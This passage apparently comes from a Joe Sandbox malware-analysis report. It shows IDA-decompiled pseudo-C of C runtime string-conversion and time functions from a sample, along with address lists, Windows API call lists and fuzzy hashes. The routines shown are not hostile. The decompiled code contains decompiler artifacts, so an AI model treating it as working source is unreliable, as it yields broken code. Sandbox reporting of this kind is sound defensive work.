						L61:
						_t98 = 0;
						L70:
						return E00412BDF(E00412FBB(_t98,  *((intOrPtr*)(_t169 - 0x1c))));
					}
					 *(_t169 - 0x3c) = _t162;
					 *(_t169 - 0x44) = _t162;
					 *(_t169 - 0x40) = _t162;
					if( *(_t169 + 0x20) == _t162) {
						_t144 =  *0x45a740; // 0x0
						 *(_t169 + 0x20) = _t144;
					}
					if( *(_t169 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t169 + 0x14) != _t95) {
							__eflags = _t95 - _t166;
							if(_t95 > _t166) {
								L69:
								_t98 = _t166;
								goto L70;
							}
							__eflags =  *(_t169 + 0x14) - _t166;
							if( *(_t169 + 0x14) <= _t166) {
								_t111 = GetCPInfo( *(_t169 + 0x20), _t169 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t169 + 0x14) - _t162;
								if( *(_t169 + 0x14) <= _t162) {
									__eflags =  *(_t169 + 0x1c) - _t162;
									if( *(_t169 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t169 - 0x30) - _t141;
									if( *(_t169 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t169 - 0x2a;
									__eflags =  *((char*)(_t169 - 0x2a));
									if( *((char*)(_t169 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t169 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t169 - 0x30) - _t141;
								if( *(_t169 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t169 - 0x2a;
								__eflags =  *((char*)(_t169 - 0x2a));
								if( *((char*)(_t169 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t169 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t169 + 0x20), 9,  *(_t169 + 0x10),  *(_t169 + 0x14), _t162, _t162);
						 *(_t169 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t169 - 4) = _t162;
						E00412260(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t169 - 0x18) = _t170;
						 *(_t169 - 0x34) = _t170;
						 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
						_t118 =  *(_t169 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t169 + 0x20), _t166,  *(_t169 + 0x10),  *(_t169 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t169 - 0x3c);
								if( *(_t169 - 0x3c) != 0) {
									_push( *(_t169 - 0x34));
									E00412A4D();
								}
								_t98 =  *(_t169 - 0x40);
								goto L70;
							}
							_t168 = MultiByteToWideChar( *(_t169 + 0x20), 9,  *(_t169 + 0x18),  *(_t169 + 0x1c), 0, 0);
							 *(_t169 - 0x4c) = _t168;
							__eflags = _t168;
							if(_t168 == 0) {
								goto L53;
							}
							 *(_t169 - 4) = 1;
							E00412260(_t168 + _t168 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t169 - 0x18) = _t170;
							_t163 = _t170;
							 *(_t169 - 0x50) = _t163;
							 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
							__eflags = _t163;
							if(_t163 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t169 + 0x20), 1,  *(_t169 + 0x18),  *(_t169 + 0x1c), _t163, _t168);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t169 - 0x40) = CompareStringW( *(_t169 + 8),  *(_t169 + 0xc),  *(_t169 - 0x34), _t143, _t163, _t168);
								}
								__eflags =  *(_t169 - 0x44);
								if( *(_t169 - 0x44) != 0) {
									_push(_t163);
									E00412A4D();
								}
								goto L53;
							} else {
								_t163 = E00412247(_t168 + _t168);
								__eflags = _t163;
								if(_t163 == 0) {
									goto L53;
								}
								 *(_t169 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E00412247(_t143 + _t143);
							_pop(_t144);
							 *(_t169 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t169 - 0x3c) = _t166;
							goto L43;
						}
					}
				}
			}































                                                                              0x0041f4be
                                                                              0x0041f4c0
                                                                              0x0041f4c5
                                                                              0x0041f4ca
                                                                              0x0041f4cf
                                                                              0x0041f4d2
                                                                              0x0041f4d6
                                                                              0x0041f4d7
                                                                              0x0041f4dd
                                                                              0x0041f4f2
                                                                              0x0041f4fc
                                                                              0x0041f502
                                                                              0x0041f505
                                                                              0x0041f507
                                                                              0x0041f507
                                                                              0x0041f4f4
                                                                              0x0041f4f4
                                                                              0x0041f4f4
                                                                              0x0041f4f2
                                                                              0x0041f514
                                                                              0x0041f522
                                                                              0x0041f522
                                                                              0x0041f525
                                                                              0x0041f52a
                                                                              0x0041f530
                                                                              0x0041f536
                                                                              0x0041f536
                                                                              0x0041f539
                                                                              0x0041f541
                                                                              0x0041f544
                                                                              0x0041f783
                                                                              0x0041f786
                                                                              0x0041f789
                                                                              0x0041f78b
                                                                              0x0041f790
                                                                              0x0041f790
                                                                              0x0041f793
                                                                              0x0041f796
                                                                              0x0041f798
                                                                              0x0041f79a
                                                                              0x0041f79a
                                                                              0x0041f7a9
                                                                              0x0041f7ab
                                                                              0x0041f7ae
                                                                              0x0041f7b4
                                                                              0x0041f7b6
                                                                              0x0041f801
                                                                              0x0041f819
                                                                              0x0041f81b
                                                                              0x0041f81d
                                                                              0x0041f81f
                                                                              0x0041f820
                                                                              0x0041f825
                                                                              0x0041f828
                                                                              0x0041f82e
                                                                              0x00000000
                                                                              0x0041f81d
                                                                              0x0041f7b8
                                                                              0x0041f7ba
                                                                              0x0041f7bf
                                                                              0x0041f7c0
                                                                              0x0041f7c3
                                                                              0x0041f7c4
                                                                              0x0041f7cd
                                                                              0x0041f7cf
                                                                              0x0041f7d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f7d3
                                                                              0x0041f7d5
                                                                              0x0041f7da
                                                                              0x0041f7db
                                                                              0x0041f7de
                                                                              0x0041f7df
                                                                              0x0041f7e0
                                                                              0x0041f7e8
                                                                              0x0041f7eb
                                                                              0x0041f7ed
                                                                              0x0041f7f8
                                                                              0x0041f7fe
                                                                              0x00000000
                                                                              0x0041f7fe
                                                                              0x0041f7ef
                                                                              0x0041f7f0
                                                                              0x0041f7f5
                                                                              0x00000000
                                                                              0x0041f552
                                                                              0x0041f554
                                                                              0x0041f7b0
                                                                              0x0041f7b0
                                                                              0x0041f831
                                                                              0x0041f841
                                                                              0x0041f841
                                                                              0x0041f55a
                                                                              0x0041f55d
                                                                              0x0041f560
                                                                              0x0041f566
                                                                              0x0041f568
                                                                              0x0041f56e
                                                                              0x0041f56e
                                                                              0x0041f574
                                                                              0x0041f581
                                                                              0x0041f58a
                                                                              0x0041f58c
                                                                              0x0041f82f
                                                                              0x0041f82f
                                                                              0x00000000
                                                                              0x0041f82f
                                                                              0x0041f592
                                                                              0x0041f595
                                                                              0x0041f5a6
                                                                              0x0041f5ac
                                                                              0x0041f5ae
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5b4
                                                                              0x0041f5b7
                                                                              0x0041f5e4
                                                                              0x0041f5e7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5e9
                                                                              0x0041f5ec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5f2
                                                                              0x0041f5f5
                                                                              0x0041f5f9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5ff
                                                                              0x0041f5ff
                                                                              0x0041f5ff
                                                                              0x0041f602
                                                                              0x0041f604
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f60d
                                                                              0x0041f60f
                                                                              0x0041f611
                                                                              0x0041f61b
                                                                              0x0041f61b
                                                                              0x0041f61d
                                                                              0x0041f620
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f622
                                                                              0x0041f613
                                                                              0x0041f615
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f615
                                                                              0x00000000
                                                                              0x0041f5ff
                                                                              0x0041f5b9
                                                                              0x0041f5bc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5be
                                                                              0x0041f5c1
                                                                              0x0041f5c5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5c7
                                                                              0x0041f5c7
                                                                              0x0041f5c7
                                                                              0x0041f5ca
                                                                              0x0041f5cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5d1
                                                                              0x0041f5d3
                                                                              0x0041f5d5
                                                                              0x0041f5db
                                                                              0x0041f5db
                                                                              0x0041f5dd
                                                                              0x0041f5e0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5e2
                                                                              0x0041f5d7
                                                                              0x0041f5d9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5d9
                                                                              0x0041f5c7
                                                                              0x0041f597
                                                                              0x0041f599
                                                                              0x00000000
                                                                              0x0041f599
                                                                              0x0041f583
                                                                              0x0041f583
                                                                              0x00000000
                                                                              0x0041f627
                                                                              0x0041f627
                                                                              0x0041f63a
                                                                              0x0041f63c
                                                                              0x0041f63f
                                                                              0x0041f641
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f647
                                                                              0x0041f653
                                                                              0x0041f658
                                                                              0x0041f65d
                                                                              0x0041f660
                                                                              0x0041f682
                                                                              0x0041f685
                                                                              0x0041f687
                                                                              0x0041f6a1
                                                                              0x0041f6ad
                                                                              0x0041f6b3
                                                                              0x0041f6b5
                                                                              0x0041f76c
                                                                              0x0041f76c
                                                                              0x0041f770
                                                                              0x0041f772
                                                                              0x0041f775
                                                                              0x0041f77a
                                                                              0x0041f77b
                                                                              0x00000000
                                                                              0x0041f77b
                                                                              0x0041f6d0
                                                                              0x0041f6d2
                                                                              0x0041f6d5
                                                                              0x0041f6d7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f6dd
                                                                              0x0041f6ed
                                                                              0x0041f6f2
                                                                              0x0041f6f5
                                                                              0x0041f6f7
                                                                              0x0041f6fa
                                                                              0x0041f718
                                                                              0x0041f71a
                                                                              0x0041f733
                                                                              0x0041f740
                                                                              0x0041f746
                                                                              0x0041f748
                                                                              0x0041f75c
                                                                              0x0041f75c
                                                                              0x0041f75f
                                                                              0x0041f763
                                                                              0x0041f765
                                                                              0x0041f766
                                                                              0x0041f76b
                                                                              0x00000000
                                                                              0x0041f71c
                                                                              0x0041f726
                                                                              0x0041f728
                                                                              0x0041f72a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f72c
                                                                              0x00000000
                                                                              0x0041f72c
                                                                              0x0041f689
                                                                              0x0041f68d
                                                                              0x0041f692
                                                                              0x0041f693
                                                                              0x0041f696
                                                                              0x0041f698
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f69e
                                                                              0x00000000
                                                                              0x0041f69e
                                                                              0x0041f687
                                                                              0x0041f574

                                                                              APIs
                                                                              • CompareStringW.KERNEL32(00000000,00000000,0044BD1C,00000001,0044BD1C,00000001,0044DD38,00000040,0041ED16,?,00000001,?,00000000,?,00000000,?), ref: 0041F4EA
                                                                              • GetLastError.KERNEL32(?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C,0044CC10,00000018,0041AB69,0044CC20,00000008,00414469), ref: 0041F4FC
                                                                              • GetCPInfo.KERNEL32(00000000,00000000,0044DD38,00000040,0041ED16,?,00000001,?,00000000,?,00000000,?,?,0041D89C,00000000,00000000), ref: 0041F5A6
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F634
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F6AD
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0041188E,00000000,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F6CA
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,0041188E,?,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F740
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                              • String ID:
                                                                              • API String ID: 1773772771-0
                                                                              • Opcode ID: a7ed4060b6436e853258559fa56c2efcca6c4cc35f93d999a8c88324d2758577
                                                                              • Instruction ID: 23585d18006ddea0dbb76c1e23dbb3d000d6f282de90190d2d0e77c960f35291
                                                                              • Opcode Fuzzy Hash: a7ed4060b6436e853258559fa56c2efcca6c4cc35f93d999a8c88324d2758577
                                                                              • Instruction Fuzzy Hash: C4B19E71900249ABCF219F54DD80AEF7BB6FF04314F24013BF814962A1D73989A6CB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004154D2, Relevance: 13.7, APIs: 9, Instructions: 196COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E004154D2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t75;
				int _t76;
				int _t77;
				int _t83;
				char* _t95;
				int _t96;
				int _t97;
				signed int _t98;
				void* _t106;
				signed int _t110;
				char* _t114;
				int _t116;
				void* _t117;
				char* _t118;
				intOrPtr _t122;

				_push(0x24);
				_push(0x44bd20);
				E00412BA4(__ebx, __edi, __esi);
				_t122 =  *0x45a5a0; // 0x0
				if(_t122 == 0) {
					if(LCMapStringW(0, 0x100, 0x44bd1c, 1, 0, 0) == 0) {
						if(GetLastError() == 0x78) {
							 *0x45a5a0 = 2;
						}
					} else {
						 *0x45a5a0 = 1;
					}
				}
				if( *(_t117 + 0x14) <= 0) {
					L11:
					_t75 =  *0x45a5a0; // 0x0
					if(_t75 != 1) {
						if(_t75 == 2 || _t75 == 0) {
							 *(_t117 - 0x24) = 0;
							 *((intOrPtr*)(_t117 - 0x2c)) = 0;
							 *(_t117 - 0x28) = 0;
							if( *(_t117 + 8) == 0) {
								_t97 =  *0x45a730; // 0x0
								 *(_t117 + 8) = _t97;
							}
							if( *(_t117 + 0x20) == 0) {
								_t96 =  *0x45a740; // 0x0
								 *(_t117 + 0x20) = _t96;
							}
							_t76 = E0041AED4( *(_t117 + 8));
							_pop(_t106);
							if( *(_t117 + 0x20) != _t76 && _t76 != 0xffffffff) {
								 *(_t117 + 0x20) = _t76;
							}
							_t77 = WideCharToMultiByte( *(_t117 + 0x20), 0,  *(_t117 + 0x10),  *(_t117 + 0x14), 0, 0, 0, 0);
							 *(_t117 - 0x20) = _t77;
							if(_t77 != 0) {
								 *(_t117 - 4) = 0;
								E00412260(_t77 + 0x00000003 & 0xfffffffc, _t106);
								 *(_t117 - 0x18) = _t118;
								 *(_t117 - 0x1c) = _t118;
								 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
								if( *(_t117 - 0x1c) != 0) {
									L28:
									if(WideCharToMultiByte( *(_t117 + 0x20), 0,  *(_t117 + 0x10),  *(_t117 + 0x14),  *(_t117 - 0x1c),  *(_t117 - 0x20), 0, 0) == 0) {
										L44:
										_t114 =  *(_t117 - 0x34);
										L45:
										if( *(_t117 - 0x28) != 0) {
											_push(_t114);
											E00412A4D();
										}
										if( *((intOrPtr*)(_t117 - 0x2c)) != 0) {
											_push( *(_t117 - 0x1c));
											E00412A4D();
										}
										_t83 =  *(_t117 - 0x24);
										goto L50;
									}
									_t116 = LCMapStringA( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 - 0x1c),  *(_t117 - 0x20), 0, 0);
									 *(_t117 - 0x30) = _t116;
									if(_t116 == 0) {
										goto L44;
									}
									 *(_t117 - 4) = 1;
									E00412260(_t87 + 0x00000003 & 0xfffffffc, _t106);
									 *(_t117 - 0x18) = _t118;
									_t114 = _t118;
									 *(_t117 - 0x34) = _t114;
									 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
									if(_t114 != 0) {
										L34:
										if(LCMapStringA( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 - 0x1c),  *(_t117 - 0x20), _t114, _t116) != 0) {
											if(( *(_t117 + 0xd) & 0x00000004) == 0) {
												if( *(_t117 + 0x1c) != 0) {
													_push( *(_t117 + 0x1c));
													_push( *(_t117 + 0x18));
												} else {
													_push(0);
													_push(0);
												}
												 *(_t117 - 0x24) = MultiByteToWideChar( *(_t117 + 0x20), 1, _t114, _t116, ??, ??);
											} else {
												 *(_t117 - 0x24) = _t116;
												if( *(_t117 + 0x1c) != 0) {
													if( *(_t117 + 0x1c) < _t116) {
														_t116 =  *(_t117 + 0x1c);
													}
													E0041ADB0( *(_t117 + 0x18), _t114, _t116);
												}
											}
										}
										goto L45;
									} else {
										_t114 = E00412247(_t116);
										if(_t114 == 0) {
											goto L45;
										}
										 *(_t117 - 0x28) = 1;
										goto L34;
									}
								} else {
									_t95 = E00412247( *(_t117 - 0x20));
									_pop(_t106);
									 *(_t117 - 0x1c) = _t95;
									if(_t95 == 0) {
										goto L23;
									}
									 *((intOrPtr*)(_t117 - 0x2c)) = 1;
									goto L28;
								}
							} else {
								goto L23;
							}
						} else {
							L23:
							_t83 = 0;
							L50:
							return E00412BDF(_t83);
						}
					}
					_t83 = LCMapStringW( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 + 0x10),  *(_t117 + 0x14),  *(_t117 + 0x18),  *(_t117 + 0x1c));
					goto L50;
				}
				_t110 =  *(_t117 + 0x14);
				_t98 =  *(_t117 + 0x10);
				while(1) {
					_t110 = _t110 - 1;
					if( *_t98 == 0) {
						break;
					}
					_t98 = _t98 + 2;
					if(_t110 != 0) {
						continue;
					}
					_t110 = _t110 | 0xffffffff;
					break;
				}
				 *(_t117 + 0x14) =  *(_t117 + 0x14) + (_t98 | 0xffffffff) - _t110;
				goto L11;
			}


















                                                                              0x004154d2
                                                                              0x004154d4
                                                                              0x004154d9
                                                                              0x004154e3
                                                                              0x004154e9
                                                                              0x00415501
                                                                              0x00415514
                                                                              0x00415516
                                                                              0x00415516
                                                                              0x00415503
                                                                              0x00415503
                                                                              0x00415503
                                                                              0x00415501
                                                                              0x00415523
                                                                              0x00415542
                                                                              0x00415542
                                                                              0x00415549
                                                                              0x0041556b
                                                                              0x00415571
                                                                              0x00415574
                                                                              0x00415577
                                                                              0x0041557d
                                                                              0x0041557f
                                                                              0x00415584
                                                                              0x00415584
                                                                              0x0041558a
                                                                              0x0041558c
                                                                              0x00415591
                                                                              0x00415591
                                                                              0x00415597
                                                                              0x0041559c
                                                                              0x004155a0
                                                                              0x004155a7
                                                                              0x004155a7
                                                                              0x004155b8
                                                                              0x004155be
                                                                              0x004155c3
                                                                              0x004155cc
                                                                              0x004155d5
                                                                              0x004155da
                                                                              0x004155df
                                                                              0x004155e2
                                                                              0x00415603
                                                                              0x00415618
                                                                              0x00415632
                                                                              0x00415702
                                                                              0x00415702
                                                                              0x00415705
                                                                              0x00415708
                                                                              0x0041570a
                                                                              0x0041570b
                                                                              0x00415710
                                                                              0x00415714
                                                                              0x00415716
                                                                              0x00415719
                                                                              0x0041571e
                                                                              0x0041571f
                                                                              0x00000000
                                                                              0x0041571f
                                                                              0x0041564c
                                                                              0x0041564e
                                                                              0x00415653
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415659
                                                                              0x00415662
                                                                              0x00415667
                                                                              0x0041566a
                                                                              0x0041566c
                                                                              0x0041566f
                                                                              0x0041568e
                                                                              0x004156a4
                                                                              0x004156ba
                                                                              0x004156c0
                                                                              0x004156e4
                                                                              0x004156ea
                                                                              0x004156ed
                                                                              0x004156e6
                                                                              0x004156e6
                                                                              0x004156e7
                                                                              0x004156e7
                                                                              0x004156fd
                                                                              0x004156c2
                                                                              0x004156c2
                                                                              0x004156c8
                                                                              0x004156cd
                                                                              0x004156cf
                                                                              0x004156cf
                                                                              0x004156d7
                                                                              0x004156dc
                                                                              0x004156c8
                                                                              0x004156c0
                                                                              0x00000000
                                                                              0x00415690
                                                                              0x00415697
                                                                              0x0041569b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041569d
                                                                              0x00000000
                                                                              0x0041569d
                                                                              0x00415605
                                                                              0x00415608
                                                                              0x0041560d
                                                                              0x0041560e
                                                                              0x00415613
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415615
                                                                              0x00000000
                                                                              0x00415615
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004155c5
                                                                              0x004155c5
                                                                              0x004155c5
                                                                              0x00415722
                                                                              0x0041572a
                                                                              0x0041572a
                                                                              0x0041556b
                                                                              0x0041555d
                                                                              0x00000000
                                                                              0x0041555d
                                                                              0x00415525
                                                                              0x00415528
                                                                              0x0041552b
                                                                              0x0041552b
                                                                              0x0041552f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415532
                                                                              0x00415535
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415537
                                                                              0x00000000
                                                                              0x00415537
                                                                              0x0041553f
                                                                              0x00000000

                                                                              APIs
                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0044BD1C,00000001,00000000,00000000,0044BD20,00000024,0041232E,?,00000100,?,000000FF,00000000,00000000,?), ref: 004154F9
                                                                              • GetLastError.KERNEL32 ref: 0041550B
                                                                              • LCMapStringW.KERNEL32(?,?,?,?,?,?,0044BD20,00000024,0041232E,?,00000100,?,000000FF,00000000,00000000,?), ref: 0041555D
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,0044BD20,00000024,0041232E,?,00000100,?,000000FF,00000000), ref: 004155B8
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0041562A
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000), ref: 00415646
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,?,00000000), ref: 004156B2
                                                                              • _strncpy.LIBCMT ref: 004156D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide$ErrorLast_strncpy
                                                                              • String ID:
                                                                              • API String ID: 4089183155-0
                                                                              • Opcode ID: 45062197424c1b8583e3cc1e41eb61fcfe89e0bef17a6dca14006f187b82e09e
                                                                              • Instruction ID: 54cba5eee7e2019415a1861e760c1354876cf14996adae629694fd667289561c
                                                                              • Opcode Fuzzy Hash: 45062197424c1b8583e3cc1e41eb61fcfe89e0bef17a6dca14006f187b82e09e
                                                                              • Instruction Fuzzy Hash: 09716A71800609EFCF119FA0DC858EE7BB6FF88354F14412AF925A62A0D7398DA1DF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041427F, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 69%
                                                                              			E0041427F(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x45798c + _t145 * 4));
							_v20 = _t138;
							if((E0041ABD0(_v16, _v12, 4, 0) | _t138) != 0 || (E0041ABD0(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E0041ABD0(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E00414150(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E00414150(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E00414150(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E00414110(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E00414110(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E00414110( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E00414110( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E0041A32F( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
